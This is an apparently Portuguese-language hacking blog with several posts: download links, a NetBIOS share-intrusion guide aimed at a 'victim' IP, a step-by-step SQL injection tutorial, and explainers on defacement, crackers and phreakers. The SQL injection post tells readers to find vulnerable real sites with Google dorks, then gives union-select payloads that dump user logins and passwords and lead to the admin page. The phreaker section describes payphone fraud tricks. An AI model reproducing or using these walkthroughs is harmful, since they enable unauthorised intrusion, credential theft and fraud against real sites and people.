Curso completo sobre delphi 7, vale a pena conferir.

No arquivo contém: 

  • Curso Completo
  • 1720 Dicas
  • 78 Códigos0 Implementados

e muito mais…

Segue o link:

4shared

 

Curso ótimo pra quem ta começando, e pra quem ja tem uma certa experiência tbm vale a pena baixar, são muitos codes…

Curso de Hacker (O Livro Proibido)

Posted: 1 de Julho de 2012 in Uncategorized

“Você tem o direito de permanecer calado.
Tudo o que você fizer usando o conhecimento
deste livro poderá ser usado contra você no tribunal.”

O único livro hacker recusado pelas editoras, então devido a este pequeno problema o Professor Marco Aurélio Thompson (Escritor do livro) decidiu liberar gratuitamente em seu site,  leia e não vai se arrepender. Posso dizer que aprendi muita coisa ai… 😀

Acesse o Site e leia ele, exige um pouco de informática avançada, mais mesmo que você não entenda muito pode aprender muita coisa com ele.

“Não existe lei que proíba alguém de ser hacker e nem a palavra hacker é sinônimo de crime.”

Antes de tudo, você tem que ter o ip da vítima, e por ser método básico de invasão não tera sucesso em todos os computadores (Você só pode ver os arquivos compartilhados pelo usuário).

Para este tutorial vamos usar o nbtstat, é um arquivo que exibe estatísticas de protocolo netbios sobre TCP/IP.

Parâmetros do DOS que seram usados:

-c (Faz aparecer o conteúdo dos nomes netbios).

-a (Exibi a tabela de nomes netbios de um computador remoto).

Vamos la então…

1º Passo:

Abra o prompt de comando (cmd.exe) e digite:

nbtstat –a IP.DA.VÍTIMA

Se a vítima tiver compartilhamento de arquivos aparecerá suas pastas e, se não, deverá aparecer uma mensagem assim: “Host Not Found” ou então “Host não encontrado” Se a vítima tiver arquivos compartilhados irá aparecer a tabela de nomes da netbios do PC dela, você precisará daquilo que estiver escrito com “<03>” atrás.

2º Passo:

Crie um arquivo de texto (com o bloco de notas mesmo) e coloque com o nome “LMHOSTS”.

Digite no arquivo o IP e o netbios, ficando assim:

  • xxx.xxx.xxx.xxx
  • netbios (x = n° componente do IP)
3º Passo:

Mapeie a unidade de disco deixando o PC da vítima como sendo parte integrante do seu, para isso vá em “Meu computador” e clique com o botão direito do mouse e em “Mapear unidade de rede…”

Vá no Menu Iniciar e em Executar e digite://ip.da.vítima e clique em OK. Agora você vai estar no PC da vítima…

Obs: conhecimento não é crime, mais não me responsabilizo pelo mal uso da informação.

Fonte: Blog Wagnet hte Hacker

Uma ferramenta poderosa e bastante funcional que contêm vários objetos para manipulações dos processos em execução e serviços. O programa é simples de usar, tem uma interface conveniente e intuitiva…

Download: Sendspace

Senha para extrair: dynamicspy

Olá leitores do DS, hoje vou passar pra vocês um tutorial básico de como praticar sql injection…

1º Passo:  Encontrar um site vulnerável.

Para achar um site vulnerável pesquisa no google por:  “inurl:noticias.php?id=.” (Sem aspas)

Escolha algum site e vamos ver se ele está vulnerável a SQL-Injection. Para verficar se ele esta vulnerável é bem simples basta adicionar uma ASPAS no final do numero de ID.

http://dstutosqlinject.com/news.php?id=10&#8242;
Se aparecer uma mensagem de erro SQL o site está vulnerável, se o site carregar normalmente ele não está, então volte para a lista do google e ache um que esteja vulnerável…

2º Passo: Aplicando os comandos SQL no site (Unir as Tabelas do site).

Vamos procurar quantas tabelas o site possui com o comando ORDER BY ou GROUP BY ex:

http://dstutosqlinject.com/news.php?id=10&#8242; order by 1
Se o site carregar normalmente prossiga.
http://dstutosqlinject.com/news.php?id=10 order by 2
Se novamente carregar sem nenhum erro prossiga.
http://dstutosqlinject.com/news.php?id=10 order by 3
Se novamente carregar sem nenhum erro prossiga
http://dstutosqlinject.com/news.php?id=10 order by 4

Suponhamos que no order by 4 ele aparece uma mensagem de erro SQL, ok com isso verificamos que o site possui 3 tabelas.
Agora vamos unir as tabelas para saber em qual esta a informação desejada com o comando abaixo:

http://dstutosqlinject.com/news.php?id=-10 union all select 1,2,3–
Após a execução do comando suponhamos que a tabela foi a número 2.

3º Passo:  Listando as tabelas e suas respectivas colunas.

Depois de ter unido as tabelas vamos lista-las com o comando:
http://dstutosqlinject.com/news.php?id=-10 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema =database()–

Suponhamos que apareçam as seguintes tabelas:
Usuarios,Links,News.

Nosso interesse e a tabela usuarios,agora vamos listar as colunas da tabela USUARIO com o comando:
http://dstutosqlinject.com/news.php?id=-10 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=’Usuarios’–

Após isso teremos as colunas:
Login,senha,email.

4º Passo:  Pegando os dados com o comando CONCAT.

Insira o seguinte comando após descoberta as colunas:
http://dstutosqlinject.com/news.php?id=-10 union all select 1, concat(Login, 0x3a, senha), 3 from Usuarios–

Entendo o comando acima,ele vai mostrar o LOGIN/SENHA da tabela USUARIOS, o FILTRO 0x3a e o : que vai separar o login e a senha.

Ex:
Admin:123456
5º Passo:  Encontrando a pagina do admin.
Utilize o programa Admin Finder, facil de achar na net (Link de como usar: http://forum.guiadohacker.com.br/showthread.php?t=1511);

Coloque o endereço do site no campo Target: http://dstutosqlinject.com/
E espere, não é sempre que o mesmo encontra a tabela de admin.
Depois de encontrar a pagina do admin e so fazer oque achar melhor.

Ex: http://dstutosqlinject.com/admin/login.php

Eh isso ai pessoal, até a proxima  o/

O que é Defacement?

Posted: 18 de Junho de 2012 in Deface, Informações, Internet

Defacement ou deface, como é conhecido popularmente, é um termo de origem inglesa para o ato de modificar ou danificar a superfície ou aparência de algum objeto. Na segurança da informação, é usado para categorizar os ataques realizados por defacers e script kiddies para modificar a página de um sítio na Internet.
Geralmente os ataques tem cunho político, objetivando disseminar uma mensagem do autor do ataque para os frequentadores do site alvo. Esses ataques podem também ter cunho pessoal, transformando-se em uma espécie de troféu para o autor — um prêmio pela sua capacidade de penetrar na segurança de um determinado sistema.
O ato pode ser analogamente comparado à pichação de muros e paredes. O autor do defacement geralmente é referenciado como defacer ou também pichador.

Exemplos de deface:

http://www.f-secure.com/weblog/archives/fscdef.gif

http://www.zone-h.org/images/stories/ms-fr-defacebig.gif

http://vidmar.net/weblog/images/vidmar_net/weblog/WindowsLiveWriter/Intereuropa.sidefacedstill_C97E/intereuropadefaced1.png

Hacker

Na verdade, os hackers são os bons mocinhos. Para os fãs de Guerra nas Estrelas, pensem no hacker como o cavaleiro jedi bonzinho. Ele possui os mesmos poderes que o jedi do lado negro da força (cracker) mas os utiliza para proteção. É um curioso por natureza, uma pessoa que têm em aprender e se desenvolver um hobby, assim como ajudar os “menos prevalecidos”. Um bom exemplo real foi quando o cracker Kevin Mitnick invadiu o computador do analista de sistemas Shimomura. Mitnick destruiu dados e roubou informações vitais. Shimomura é chamado de hacker pois usa sua inteligência para o bem, e possui muitos mais conhecimentos que seu inimigo digital. Assim facilmente montou um honeypot (armadilha que consiste em criar uma falsa rede para pegar o invasor) e pegou Kevin. Infelizmente a imprensa confundiu os termos e toda notícia referente a baderneiros digitais se refere à hacker.

Cracker

Esses sim são os maldosos. Com um alto grau de conhecimento e nenhum respeito, invadem sistemas e podem apenas deixar a sua “marca” ou destruí-los completamente. Geralmente são hackers que querem se vingar de algum operador, adolescentes que querem ser aceitos por grupos de crackers (ou script kiddies) e saem apagando tudo que vêem ou mestres da programação que são pagos por empresas para fazerem espionagem industrial. Hackers e crackers costumam entrar muito em conflito. Guerras entre grupos é comum, e isso pode ser visto em muitos fóruns de discussão e em grandes empresas, as quais contratam hackers para proteger seus sistemas.

Phreaker

Maníacos por telefonia. Essa é a maneira ideal de descrever os phreakers. Utilizam programas e equipamentos que fazem com que possam utilizar telefones gratuitamente. O primeiro phreaker foi o Capitão Crunch, que descobriu que um pequeno apito encontrado em pacotes de salgadinhos possui a mesma freqüência dos orelhões da AT&T, fazendo com que discassem de graça. Um programa comum utilizado é o blue box, que gera tons de 2600 pela placa de som, fazendo com que a companhia telefônica não reconheça a chamada. Outra técnica muito usada principalmente no Brasil é a de utilizar um diodo e um resistor em telefones públicos. Ou de cobrir o cartão telefônico de papel alumínio para que os creditos não acabem. Técnicas como essas são utilizadas no mundo inteiro. O phreaker é uma categoria à parte, podem ser hackers, crackers ou nenhum dos dois. Alguns phreakers brasileiros são tão avançados que têm acesso direto à centrais de telefonia, podendo desligar ou ligar telefones, assim como apagar contas. Um dos programas muitos usados para isso é o ozterm, programinha de terminal que funciona em modo dos. Por sinal, muito difícil de encontrar na net.

 Att DynamicSpy.